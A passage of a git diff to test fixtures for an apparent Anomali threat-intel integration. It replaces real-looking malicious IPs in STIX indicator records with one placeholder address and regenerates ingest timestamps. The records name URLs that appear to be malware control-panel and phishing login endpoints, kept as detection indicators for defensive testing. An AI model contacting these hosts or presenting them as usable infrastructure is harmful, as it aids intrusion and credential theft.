CyberCrime","id":"indicator--57fb3a6f-09ca-44a2-b309-724b570e1fd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-25T02:54:21.544Z","name":"mal_url: 
http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:21.544Z"} {"created":"2020-02-25T02:54:32.178Z","description":"TS ID: 55347597608; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--1b2dfaef-5caa-4114-9634-cf2f9959dbfb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:54:32.178Z","name":"mal_url: http://farsson.com/~zadmin/5/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/5/login.php']","type":"indicator","valid_from":"2020-02-25T02:54:32.178Z"} {"created":"2020-02-25T02:54:37.327Z","description":"TS ID: 55347597484; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--44544bfd-7131-4530-a9de-96c1840101c1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:54:37.327Z","name":"mal_url: http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:37.327Z"} {"created":"2020-02-25T02:54:37.383Z","description":"TS ID: 55347597463; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--51779de2-0d07-4d60-abf6-afdc0dfc7637","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:54:37.383Z","name":"mal_url: http://0ooo.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value 
= 'http://0ooo.xyz/login']","type":"indicator","valid_from":"2020-02-25T02:54:37.383Z"} {"created":"2020-02-25T02:54:48.929Z","description":"TS ID: 55347597475; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--b7d14453-ad19-4246-961a-72f0e5136874","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:54:48.929Z","name":"mal_url: http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:54:48.929Z"} -{"created":"2020-02-25T02:54:54.632Z","description":"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--064f2766-97b6-481d-a273-f80a97524be8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:54:54.632Z","name":"mal_ip: 190.97.162.37","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '190.97.162.37']","type":"indicator","valid_from":"2020-02-25T02:54:54.632Z"} +{"created":"2020-02-25T02:54:54.632Z","description":"TS ID: 55347597487; iType: mal_ip; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--064f2766-97b6-481d-a273-f80a97524be8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:54:54.632Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:54:54.632Z"} {"created":"2020-02-25T02:55:06.15Z","description":"TS ID: 55347597650; iType: mal_url; State: active; Org: Dataline Ltd; 
Source: CyberCrime","id":"indicator--3f3bca20-c218-431d-8250-0f600b011971","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:06.15Z","name":"mal_url: http://farsson.com/~zadmin/1/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/1/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:06.15Z"} {"created":"2020-02-25T02:55:06.186Z","description":"TS ID: 55347597472; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--6b3d6689-75e8-4f50-a1c0-f1a1e6158493","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:55:06.186Z","name":"mal_url: http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:55:06.186Z"} -{"created":"2020-02-25T02:55:06.314Z","description":"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--1306883c-b911-4116-9121-492450e4bb07","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-25T02:55:06.314Z","name":"mal_url: http://92.63.197.191/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.191/login']","type":"indicator","valid_from":"2020-02-25T02:55:06.314Z"} +{"created":"2020-02-25T02:55:06.314Z","description":"TS ID: 55347597495; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: 
CyberCrime","id":"indicator--1306883c-b911-4116-9121-492450e4bb07","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-25T02:55:06.314Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-25T02:55:06.314Z"} {"created":"2020-02-25T02:55:27.523Z","description":"TS ID: 55347597627; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--d4a02ea1-435f-472e-8013-07e4e24f5a2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:27.523Z","name":"mal_url: http://farsson.com/~zadmin/3/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/3/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:27.523Z"} {"created":"2020-02-25T02:55:35.424Z","description":"TS ID: 55347597528; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--1e8d894d-1e8b-4ba9-ae25-1e3e00c055ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-25T02:55:35.424Z","name":"mal_url: http://atomicwallet.email/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atomicwallet.email/login.php']","type":"indicator","valid_from":"2020-02-25T02:55:35.424Z"} -{"created":"2020-02-25T02:55:35.462Z","description":"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--cb377636-13ce-421e-926f-e33e2b954263","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:55:35.462Z","name":"mal_url: 
http://190.97.162.37/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://190.97.162.37/login']","type":"indicator","valid_from":"2020-02-25T02:55:35.462Z"} +{"created":"2020-02-25T02:55:35.462Z","description":"TS ID: 55347597489; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--cb377636-13ce-421e-926f-e33e2b954263","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:55:35.462Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-25T02:55:35.462Z"} {"created":"2020-02-25T02:55:35.496Z","description":"TS ID: 55347597477; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--1163cdee-566a-404a-b66e-657857eb4af3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:55:35.496Z","name":"mal_url: http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:55:35.496Z"} -{"created":"2020-02-25T02:55:39.691Z","description":"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:39.691Z","name":"mal_ip: 195.133.201.191","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = 
'195.133.201.191']","type":"indicator","valid_from":"2020-02-25T02:55:39.691Z"} +{"created":"2020-02-25T02:55:39.691Z","description":"TS ID: 55347597536; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--3190b47c-44f4-4e7e-8bd5-7b16a62fd3e9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:55:39.691Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-25T02:55:39.691Z"} diff --git a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json index 121ce28f55d..123f0a43007 100644 --- a/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json +++ b/packages/ti_anomali/data_stream/limo/_dev/test/pipeline/test-anomali-limo-ndjson.log-expected.json @@ -39,7 +39,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385010143Z", + "ingested": "2021-12-13T08:38:40.022544100Z", "original": "{\"created\":\"2020-01-22T02:58:57.431Z\",\"description\":\"TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--44c85d4f-45ca-4977-b693-c810bbfb7a28\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T02:58:57.431Z\",\"name\":\"mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.431Z\"}", "category": "threat", "type": "indicator", 
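Review bot: The `event.ingested` values in this hunk and in the `@@ -91` and `@@ -142` hunks change only because the expected file was regenerated; they carry no information about the fix and will churn on every future regeneration. If the pipeline test config for this data stream does not already list `event.ingested` under `dynamic_fields`, adding `dynamic_fields: {event.ingested: ".*"}` there would let later fixture updates touch only the lines that matter. The single substantive change in this file section is the `name` value in the `@@ -161` hunk, which tracks the sanitised fixture.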
@@ -91,7 +91,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385038717Z", + "ingested": "2021-12-13T08:38:40.022557600Z", "original": "{\"created\":\"2020-01-22T02:58:57.503Z\",\"description\":\"TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f9fe5c81-6869-4247-af81-62b7c8aba209\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T02:58:57.503Z\",\"name\":\"mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.503Z\"}", "category": "threat", "type": "indicator", @@ -142,7 +142,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385046762Z", + "ingested": "2021-12-13T08:38:40.022562300Z", "original": "{\"created\":\"2020-01-22T02:58:57.57Z\",\"description\":\"TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b0e14122-9005-4776-99fc-00872476c6d1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-22T02:58:57.57Z\",\"name\":\"mal_url: http://f0387770.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387770.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:57.57Z\"}", "category": "threat", "type": "indicator", 
@@ -161,7 +161,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://178.62.187.103/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime", "modified": "2020-01-22T02:58:59.366Z", "valid_from": "2020-01-22T02:58:59.366Z", 
@@ -185,16 +185,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://178.62.187.103/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "178.62.187.103", - "full": "http://178.62.187.103/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385052202Z", - "original": "{\"created\":\"2020-01-22T02:58:59.366Z\",\"description\":\"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-01-22T02:58:59.366Z\",\"name\":\"mal_url: http://178.62.187.103/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://178.62.187.103/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.366Z\"}", + "ingested": "2021-12-13T08:38:40.022569300Z", + "original": "{\"created\":\"2020-01-22T02:58:59.366Z\",\"description\":\"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-01-22T02:58:59.366Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.366Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -245,7 +245,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385056961Z", + "ingested": "2021-12-13T08:38:40.022574800Z", "original": "{\"created\":\"2020-01-22T02:58:59.457Z\",\"description\":\"TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--189ce776-6d7e-4e85-9222-de5876644988\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-22T02:58:59.457Z\",\"name\":\"mal_url: http://appareluea.com/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://appareluea.com/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:58:59.457Z\"}", "category": "threat", "type": "indicator", @@ -297,7 +297,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385061359Z", + "ingested": "2021-12-13T08:38:40.022580800Z", "original": "{\"created\":\"2020-01-22T02:59:06.402Z\",\"description\":\"TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a4144d34-b86d-475e-8047-eb46b48ee325\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T02:59:06.402Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot3/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot3/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:06.402Z\"}", "category": "threat", "type": "indicator", @@ -316,7 +316,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.144.128.116", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime", "modified": "2020-01-22T02:59:19.990Z", "valid_from": "2020-01-22T02:59:19.99Z", 
@@ -338,12 +338,12 @@ "first_seen": "2020-01-22T02:59:19.990Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.144.128.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385065617Z", - "original": "{\"created\":\"2020-01-22T02:59:19.99Z\",\"description\":\"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-22T02:59:19.99Z\",\"name\":\"mal_ip: 162.144.128.116\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.144.128.116']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:19.99Z\"}", + "ingested": "2021-12-13T08:38:40.022585800Z", + "original": "{\"created\":\"2020-01-22T02:59:19.99Z\",\"description\":\"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-22T02:59:19.99Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:19.99Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -394,7 +394,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385070016Z", + "ingested": "2021-12-13T08:38:40.022589700Z", "original": "{\"created\":\"2020-01-22T02:59:20.155Z\",\"description\":\"TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f9c6386b-dba2-41f9-8160-d307671e5c8e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-22T02:59:20.155Z\",\"name\":\"mal_url: http://ntrcgroup.com/nze/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:20.155Z\"}", "category": "threat", "type": "indicator", @@ -446,7 +446,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385074584Z", + "ingested": "2021-12-13T08:38:40.022595Z", "original": "{\"created\":\"2020-01-22T02:59:25.521Z\",\"description\":\"TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--98fad53e-5389-47f7-a3ff-44d334af2d6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T02:59:25.521Z\",\"name\":\"mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:25.521Z\"}", "category": "threat", "type": "indicator", 
@@ -497,7 +497,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385079022Z", + "ingested": "2021-12-13T08:38:40.022602600Z", "original": "{\"created\":\"2020-01-22T02:59:25.626Z\",\"description\":\"TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--76c01735-fb76-463d-9609-9ea3aedf3f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T02:59:25.626Z\",\"name\":\"mal_url: http://f0390764.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0390764.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:25.626Z\"}", "category": "threat", "type": "indicator", @@ -516,7 +516,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 45.143.138.39", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-22T02:59:36.461Z", "valid_from": "2020-01-22T02:59:36.461Z", 
@@ -538,12 +538,12 @@ "first_seen": "2020-01-22T02:59:36.461Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "45.143.138.39" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385083130Z", - "original": "{\"created\":\"2020-01-22T02:59:36.461Z\",\"description\":\"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T02:59:36.461Z\",\"name\":\"mal_ip: 45.143.138.39\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.143.138.39']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:36.461Z\"}", + "ingested": "2021-12-13T08:38:40.022609900Z", + "original": "{\"created\":\"2020-01-22T02:59:36.461Z\",\"description\":\"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T02:59:36.461Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:36.461Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -594,7 +594,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385087629Z", + "ingested": "2021-12-13T08:38:40.022646200Z", "original": "{\"created\":\"2020-01-22T02:59:41.193Z\",\"description\":\"TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--6f0d8607-21cb-4738-9712-f4fd91a37f7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-22T02:59:41.193Z\",\"name\":\"mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.193Z\"}", "category": "threat", "type": "indicator", @@ -613,7 +613,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://95.182.122.184/", + "name": "mal_url: http://89.160.20.156/", "description": "TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime", "modified": "2020-01-22T02:59:41.228Z", "valid_from": "2020-01-22T02:59:41.228Z", 
@@ -637,16 +637,16 @@ "provider": "CyberCrime", "url": { "path": "/", - "original": "http://95.182.122.184/", + "original": "http://89.160.20.156/", "scheme": "http", - "domain": "95.182.122.184", - "full": "http://95.182.122.184/" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385092087Z", - "original": "{\"created\":\"2020-01-22T02:59:41.228Z\",\"description\":\"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime\",\"id\":\"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:41.228Z\",\"name\":\"mal_url: http://95.182.122.184/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://95.182.122.184/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.228Z\"}", + "ingested": "2021-12-13T08:38:40.022651100Z", + "original": "{\"created\":\"2020-01-22T02:59:41.228Z\",\"description\":\"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime\",\"id\":\"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-22T02:59:41.228Z\",\"name\":\"mal_url: http://89.160.20.156/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:41.228Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -664,7 +664,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 198.54.115.121", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", "modified": "2020-01-22T02:59:51.313Z", "valid_from": "2020-01-22T02:59:51.313Z", @@ -686,12 +686,12 @@ "first_seen": "2020-01-22T02:59:51.313Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "198.54.115.121" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385098619Z", - "original": "{\"created\":\"2020-01-22T02:59:51.313Z\",\"description\":\"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--408ebd2d-063f-4646-b2e7-c00519869736\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-22T02:59:51.313Z\",\"name\":\"mal_ip: 198.54.115.121\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '198.54.115.121']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T02:59:51.313Z\"}", + "ingested": "2021-12-13T08:38:40.022654800Z", + "original": "{\"created\":\"2020-01-22T02:59:51.313Z\",\"description\":\"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: 